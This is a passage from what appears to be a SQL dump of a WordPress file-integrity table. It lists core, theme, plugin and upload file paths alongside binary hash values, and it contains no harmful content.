����`^','',0,'?'),('���al�V�?�f�\Zё�','wp-includes/IXR/class-IXR-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d߹��$c�9�','\0�{M��U�\rN.�)���-����`wH���','',0,'?'),('�\0h�Kf��\0�','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e�����','0��Q7018�ު9-�z9ؽq��SrĒ�P��','',0,'?'),('������H�06�','wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K\\�b�$�F','&$�ĉ9����~_SH�_�̓�%L���\'&�','',0,'?'),('�S�Rj=�h�y2�ZX','wp-content/uploads/2019/12/pexels-photo-768x512.jpg',0,'lף}O�ӂ�~�q��@','lף}O�ӂ�~�q��@','�&�����F\'��{�N��e7����V�K','',0,'?'),('����8(\Z�j�Z]}','wp-includes/js/jquery/ui/effect-pulsate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\0�q2�l����d','ȩ~��0M���0\"���7 ]1�sP�J�T','',0,'?'),('�k��מˊ\'���&�_','wp-content/plugins/wordpress-seo/admin/class-yoast-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Sxr�;�����t�N','��S���O�R�2A���_��^[zF�;:y','',0,'?'),('�-�(ҟ�oF�L���','wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ5�/�ҲP��C','�[T����4Gzݹo�ɓHL4�` �(��;�Gc','',0,'?'),('�9�t*��/{����','wp-content/plugins/wordpress-seo/css/dist/alerts-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�z�8tC 2i','<\n.ߟj?�\0��\Z��X�q� ���?�ן�','',0,'?'),('�;xYTx���{�)U:4','wp-content/languages/en_GB-1bba9045bb07c89671c88a3f328548e8.json',0,'�S_�2~T�p���`i','�S_�2~T�p���`i','���SB����?]x[��)Z\0�p\0=(�s8f���','',0,'?'),('�U�S�\rB��c>\r�','wp-includes/blocks/latest-comments/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��O7\\� (�I�q','�o�H88!��x�U���D!��W$~k�I�','',0,'?'),('�X�R�ev�� O��U','wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ei�61���t$LW','���@�u�t\Z��G@�G������H3)����g','',0,'?'),('�X����g5��(�=c','wp-includes/js/tinymce/skins/lightgray/img/trans.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('�h�w^�(�n���','wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_X*֤y4:F��)�$D','��4�]�eRDJP�6ƗC �p�ڶ�\Z ','',0,'?'),('�pt_ Y����7L�Kt','wp-admin/css/deprecated-media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uְ�Z�l�\"�','�����K��ṥ�=���$�ϻ���]�C�i','',0,'?'),('��]�[���\r���','wp-content/plugins/wordpress-seo/src/config/migrations/20191011111109_WpYoastIndexableHierarchy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!IQ՟���]k�ĉ�i','ʬ&�@��\n�OEl������Y���','',0,'?'),('�������X�\0T�O��','wp-content/themes/twentynineteen/sass/navigation/_links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�,��� p�A��','\0�4����^\ZY��i�_�O��_�#','',0,'?'),('��l?]�Z�jKY�','wp-content/plugins/wordpress-seo/src/presenters/open-graph/locale-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���]`��b)Č�','NJH�bQ#��E$���5*8����xZ�s�!�','',0,'?'),('���\'(jli�����','wp-content/themes/twentytwenty/template-parts/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&qW���,��e ','g(GE\0�+f�z�.?M�E���?q��̝��@','',0,'?'),('��.��9��q��+�oA','wp-content/plugins/redirection/locale/json/redirection-it_IT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÇE\\�9���x��ڬ','�z���\0[5iǟFX{_��I��`��M��F','',0,'?'),('����T��D��F�K1�','wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������ԭ��-p�[','�Bd7-Nd}�Y���l�b[6C��F��\n\r4~>','',0,'?'),('������l���:�','wp-content/themes/vega/color-schemes/green.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-e�hJ��}�M�^��','���V�ͱ�g}�yL�\'�~��;��}=s��y��','',0,'?'),('���N��.�c��� ]`','wp-content/plugins/wordpress-seo/src/actions/indexing/indexation-action-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꍺ�<٩S�HQO��','&��4Dք��P�\"����w?��\r��2q�','',0,'?'),('���d{W,�� �\0\Z�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kX�Zb����5��','[\0N����E�g����gd�q\r����*\'I�','',0,'?'),('����xY�4}���;6�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-hr.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9J]���������w','2@\Z\'y��p��E�\0f��P��U��e\'�','',0,'?'),('��/GΞӶ[�ǜ��C','wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C*���?�4�k��&-s','�v2�UW�n�4V�[an�*�?����X��','',0,'?'),('���n�1�u`z�@ң�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_CH.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W����������Sۨ��','M4#\\���g�ZK��2���=�Y��h\'�\\','',0,'?'),('���[�/�9}�`:w�P','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��{�\0S�g��D���','��ы��I<�m�db�}��̑x��V�5/����','',0,'?'),('��v���K:�ZF','wp-includes/blocks/site-tagline/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂1c�Z�>�R �EJm','��U)�}�$EMb0mCTA�0\\pN2�O^','',0,'?'),('���7�%�̬���&�','wp-includes/css/dist/block-library/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'B�Y�����+','�+����O���wA�c�9�8����','',0,'?'),('���\r�~;��!�_�b�','wp-content/uploads/2019/08/young-300x250.jpg',0,'��J���C�T���Y','��J���C�T���Y','���Ww���0@0�����Fh?E�$|]w�','',0,'?'),('��en\'��LBvj�\r','wp-content/plugins/wordpress-seo/src/integrations/third-party/bbpress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q7�$��Pv��K(7m','�z��)y���JV����g{ٱxC�\"vFndPX','',0,'?'),('�\0�����.}�fwA','wp-includes/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('�\r��%�A}�* ��V','wp-content/plugins/wordpress-seo/src/helpers/schema/replace-vars-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�g�fL.�1��[9','T��IM�a��{n�B��=k�ꂞP��=�Jh','',0,'?'),('�?TEb�V+�#闓HC','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/LogicException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%�.v��!�{�9','>-�q;�v�3��R�ј��u�A�Ir,��8�^','',0,'?'),('�[���QH\"pS1Ȫ�c','wp-admin/images/arrows-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� Q�}��ydb#6�','�,c�˿\Z�i(~���)����\'��8[A�/�I��x','',0,'?'),('�k���j���r-�|%','wp-content/plugins/redirection/models/redirect/redirect-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fU4��zV���\rS:','J�����m���?��-@�j�)�T���d','',0,'?'),('�kLǤe���(�ȸK','wp-content/plugins/wp-cerber/assets/flags/ch.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�k�g�iT���I�ކ','R���:�=b���U|O@��R�˂}��-','',0,'?'),('�U>�W\\b-B�)ެ��','wp-content/languages/plugins/wordpress-seo-en_GB-3ea458748e75af63351e6200d8753526.json',0,';Խ��&��L�/U�',';Խ��&��L�/U�','��:[�����!X�Ԗ�^���#�K�9\0','',0,'?'),('��[ixT�q��~Wv�e','wp-admin/network/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�JY��Fq�^��N�','z��w�iL�_�*� !$c��L*�T�qDN_','',0,'?'),('��F~���y�c7v-','wp-includes/js/customize-preview-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������447\"-�n��','v\\�y��pw��w�.�VDCi�Ĝ����ע','',0,'?'),('�����s�CU2@�5\'','wp-content/uploads/2016/11/interior-design-2047075_960_720-updraft-pre-smush-original.jpg',0,'a�=���<5B�\0','a�=���<5B�\0',' �_�+� 4z�k�\n-6����$���2���','',0,'?'),('��H��_X�Ѕ�gU','wp-content/themes/twentytwentyone/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oL6-!讜k���y�t','��\0�<w����3=S��wT-|\"��uV�c � w','',0,'?'),('����Ѥ;D���','wp-content/plugins/wp-cerber/assets/flags/jp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Jn@��Aל^�','��7���^qU���` �� �}wͧ�h��','',0,'?'),('�䑖�w�7:\'�h*','wp-includes/js/dist/vendor/lodash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C`�]1~������','׳[�p:� �z���K�QWw�t}H��I�( �','',0,'?'),('��G�Gn���I�+R?','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pd\rAb�6(J��\"�(;','��?�f�`00g�a�0�����Gp$���vL�','',0,'?'),('��i�%���o�)�#��\\','wp-includes/blocks/image/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&_\"s�����x','?QF��<%�NVg�-ţ`L:�\n������','',0,'?'),('���2���:�����','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('�2s�X+CZJ�L�,','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�GA��<�x7^^�j.','ѢV��t�`�0�䃕�����9hj~��9y','',0,'?'),('�M�}�n�\"4jd�R��','wp-includes/blocks/post-template/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�����M�}\\�','K�.�c�~�������[&\'��1�S�S���','',0,'?'),('�\Z-��x7�(A�4���','wp-includes/js/swfupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�\"���lj͘�F�;,','wp-content/plugins/wordpress-seo/src/integrations/watchers/option-titles-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��`���FW%l�','��F���IVQŁ�UfP���\Z\n�CNFT','',0,'?'),('�(��\"����?4U','wp-content/themes/twentytwenty/assets/css/editor-style-classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Vn-�C^�j�','CQA�FFC�z�R[ZM`�Gbf�2�A�pЋ���','',0,'?'),('�,:���3�չ�C@�~�','wp-content/plugins/wordfence/modules/login-security/classes/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�a�b�vr�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�1W;c�����N�\"�u','wp-includes/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/o^ѳ\":�?~R�O','�\no��.�k�p+��x�����g7 ��A<Q7,��','',0,'?'),('�J��B�GT�;,l��T','wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%� ��#���#�5','',0,'?'),('�O�(�H�k8\\�m��','wp-content/plugins/wordpress-seo/css/dist/schema-blocks-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0f����������','��r\r�4a���Hyٔ�9@�ݢz����&','',0,'?'),('�V�^�3��m6�._P','wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('�WA�Cߜ�J�:��','wp-content/languages/en_GB.mo',0,'$w$�k�N<���o�K��','$w$�k�N<���o�K��','C�I/�\0�T��]!���6Q���y��h�{t�','',0,'?'),('�d��ׂ.��>Ird�@','wp-content/plugins/wordpress-seo/languages/wordpress-seo-zh_TW.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mM�\Zt%ɺI\0nTZ','��[��XZ��qzjx$�z���f⥼�4.','',0,'?'),('�j6�Vr?����Z��','wp-content/plugins/wordpress-seo/js/dist/languages/en-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J0�%�j�5xr���','����6�$���Q�+��qΜ��������y','',0,'?'),('�q2t�rۗ,]s*r�','wp-includes/blocks/audio/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5���3�yb�A�','��@,BW/�R-�M�w������]ٻ','',0,'?'),('�����[���D?_�[�','wp-includes/random_compat/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('���7�M3�$��','wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('����2@�k�w>K�2','wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Y~g��l�w��6r�:','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('����H\0ۙ��h�C��','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��i-B����\n\\','�M�:�u�,�)�Y&K�\"�W^��F��8��b�','',0,'?'),('��wt�H���-s�\0�n','wp-includes/js/wplink.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!{�TW�V����','�@e�{F� o���`+5p�Q\'+�eC���','',0,'?'),('���=֬H�@-i��','wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q$E{ XKK�Fq�Ԛf>','�<��ھWmP�|������K�v���\rmz','',0,'?'),('��\\`Ǫ��d�{�','wp-content/uploads/2019/09/cleaning-3977589_960_720-150x150.jpg',0,'�ad�2��8`��','�ad�2��8`��','�І03�X���B�HZ��W�:o�����u�n','',0,'?'),('�֔��ߚy(qD�w�','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YJs@j���r�jtm','�3ÑѲs��\r&�z=���ds��pJx�3�w','',0,'?'),('�֣�wi:}\\�֭��','wp-content/uploads/2019/09/garden-waste-300x250.jpg',0,'Ve8���_�X��0c�','Ve8���_�X��0c�','�&�iM�iư�y�e�V�f��Qx���yJ�','',0,'?'),('��(B�A!��������','wp-includes/theme-templates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�y��X�w\n��Dm','8\\ң�H�x\\%��R�l`����g�.i�g','',0,'?'),('��A?8���y*��+�','wp-content/uploads/2021/08/building-768815_1920.jpg',0,'���C�M�-\ny����L','���C�M�-\ny����L','B�#�r$���� ��r�� �J0Y�T��','',0,'?'),('��-\'f�ߕ?X:4\r!','wp-includes/blocks/table/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"9�T�ʳ��H��','�mX�4����3�ӈ�&�;a�����\"0�z','',0,'?'),('��h�L���JH�X#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�c)��Re�Y�l�7��','.�`�i�W� t1�}�sty�ɪ���!K','',0,'?'),('��d.�\Z���\n��\r','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/lt.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�ΐ3\0��G�K���','w�T*�͓��l[w���w$����ੰf','',0,'?'),('����Kǥݳ�|u��','wp-content/themes/twentytwentyone/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�:/=�P�|Ds�)�','v|�^�ц��E�O�x���̠R��ƌ$��G','',0,'?'),('��h�_��-�\rus{t�','wp-content/plugins/wp-cerber/assets/flags/bd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_R�jQ�k.��4','k�j8�F��/���)�5��aC�,�12O�H\'','',0,'?'),('���^��\'�q���0��','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ln��j�\\w�X=7I','7���\"1j��L?9Y�\"��&���kŌVD�|��','',0,'?'),('�%n��Tߒ ^�gXΰ','wp-admin/js/inline-edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �����L','��Lu�D�t\\ShM�j-���X�v���4#�Q','',0,'?'),('�3��aD�w�P����q','wp-admin/includes/class-theme-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڪ&��텾��U�7y','��-R��RlG���cR�K��������a:���*>','',0,'?'),('�6��uQ[��6�̜l��','wp-content/plugins/wordpress-seo/src/wrappers/wp-rewrite-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�d�I;r�~~U','��$������sU�%;|�^[� ��y8','',0,'?'),('�7V�9��x����','wp-content/uploads/2016/11/kitchen-960x150.jpg',0,'���n_W>�<�ϝ','���n_W>�<�ϝ','3虥�c�W`w�ǿi@��h��D�k�� �','',0,'?'),('�C݆w�\r��f� �\\�','wp-content/plugins/wp-cerber/languages/wp-cerber-sr_RS.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rD���.֡h�-�','`�A�\"��f�*�B2$e �Vr�̜��3��','',0,'?'),('�G���M�.��','wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xY� i��F욤yG�','Z{���L��� �GNJ��\n� ����⪋��','',0,'?'),('�L(,�.����ZP/:�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�N�-�Y�)��~.�n','wp-content/plugins/wordpress-seo/src/deprecated/admin/class-social-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�N��]�;R�W���','�_C=��.\'�2��\'����&-�XȢ,�k*���','',0,'?'),('�\\��� D�LW�O�','wp-content/languages/themes/twentytwentyone-en_GB.mo',0,'dmq\0Tt[R�z\'\'��','dmq\0Tt[R�z\'\'��','��?��F��R�9�a����{gY�B��!��q','',0,'?'),('�m`��5\n+��7��','wp-includes/blocks/search/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��\0�X`��<�x\ra*7','Oܼ~k�!�À]�*���*cDD)W+�p%F�','',0,'?'),('�zU)��퇵�r���x','wp-content/plugins/wordpress-seo/admin/class-yoast-notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� {�&S�\"�Ne�n','�5!Js5ҨL�ՠ������eb�yM��','',0,'?'),('����X�1�L�w��^','wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ଥ�Ld�a܀�@�O8','HƆX`�JF�?�2�W�%i2[��M���','',0,'?'),('��n&���n�!崬�','wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�ˁx�J��TG���','�+���W���V��3�(qF���r;�|^�@��','',0,'?'),('����Yh� ����� �','wp-content/plugins/wordpress-seo/src/helpers/user-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�6��U.K�','đ-�����\0xB�1C�+D�O��ɭ��%�H�?3','',0,'?'),('��|>����mp�','wp-content/languages/plugins/wordpress-seo-en_GB-d91b7ab6b8db942d9e33fad9a9f8d782.json',0,'����dhcx(B','����dhcx(B','�L;��)��D��!�Oidҳy���7-�W��','',0,'?'),('��{���{8B%@\0�x�','wp-includes/blocks/post-featured-image/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8MJ� ��.�\'��,�','#�{F2��y7l�B����\Z���ɿ��9D','',0,'?'),('����EX���|T��','wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������D�Bj��>�','����F�u�~�^�_2\n�TE��G^1-Gae','',0,'?'),('��Vr^T2���X�O���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�B� �?�{n��\Z','t�����p1��\ZQU�|O���\Z(0�\"tV[','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���i!1�� �','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('��!��4��r��]�','wp-content/plugins/wordpress-seo/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t0x1E�w�F&�@T','�\r^�X�\">H\\j�,YZ�\"\n�cä�\0�:2','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U T@��nyȳ�^a�u��\'','',0,'?'),('��2.|�,�I`ӌ�xt�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/NullLogger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U{���HԀ�4p�(�','�&�t9�F\"�`a�t�f��G������l�f{','',0,'?'),('������=�*�c���','wp-content/languages/plugins/hello-dolly-en_GB.mo',0,'�v���w����Pq�','�v���w����Pq�','ٹ��+�H�\r����L\rC6oۨ��hr@Yw:�','',0,'?'),('�\nr\'���AZ}��!�d�','wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�F��5�y��,\Z�J-','���-��L����TBh+��&+�ck_M��ƅ','',0,'?'),('�,�{�vF��ߝ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.������ #�v�}','�i���$��h�}�ws�������X��2�c','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_����;\Z���5�','\n��m��m^�G&%�\0�SKm��Y2p����#','',0,'?'),('�8�������P5aĨ� ','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V 6','',0,'?'),('�B�Pfn���a����','wp-content/plugins/wordpress-seo/src/helpers/short-link-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lVP֝4<5��Nm�$�','3����0��η�?y�-P��uS��S�b�','',0,'?'),('�F5x�z8��KpY��','wp-content/plugins/wordfence/css/diff.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g �� �$���`r�Q','��$��hEJ^54<$�ӭYc����&','',0,'?'),('�f{�A�ol�eZ��*�','wp-content/uploads/2019/08/renewable-energy-updraft-pre-smush-original.jpg',0,'\r�/�#��al-����*','\r�/�#��al-����*','�iC�\Z�k\\KF�0m�[3�OZ�-rsGJZ,r��','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dh�P2\r��1A��KW','f��<mݨ�=f�3�>qD����3@>���Á�','',0,'?'),('��L��Ί�6�7m���','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.1۠�R���g{�tJ','�*�^��BiΔ�>C�����F]���3��','',0,'?'),('��&JQv4�!��','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�{�U�e�k��','L����h-�h�+-�&J���״��mv��ъ(','',0,'?'),('��d�^j�fBV��k�','wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\\�M��h�','%���|�\'vJ��Z����CfW��5�=M|�=-�','',0,'?'),('��56�R���r�(62','wp-content/uploads/2016/11/White-Modern-Kitchen.jpg',0,'�Q1߆�n{��B�iGT','�Q1߆�n{��B�iGT','{7�Δ\ZhP$h��j�06�?\Z��UwY��f','',0,'?'),('��l�3. XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���ڮ�V�3���','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��N������^�J�W��','wp-content/plugins/wordpress-seo/src/models/seo-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&1��XJ$ߢ��/�l','\n�olq]Ti�R�_�΄������cw��u�*','',0,'?'),('��{�1u�.b}κ0$�','wp-content/plugins/wp-cerber/assets/flags/bi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|��\\_��27�k�� ','v����JȢ�\"DWK�9q �Q�^F%a�A','',0,'?'),('�Ŷ�\Z�6�ET���','wp-content/plugins/wordpress-seo/css/dist/inside-editor-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J\Z����6���ǜ','.TLêr���cB�ݑR�x��ܐ�H���1f','',0,'?'),('��<���)�\"���vY4','wp-includes/blocks/verse/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��\Z���J�.�c����','!�wN��.v���v�8[�DW� $�_��W55','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a��:s�]2�','u�� �:��,&�F@G��*컮&�����W��','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��=�����:� s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�\0� 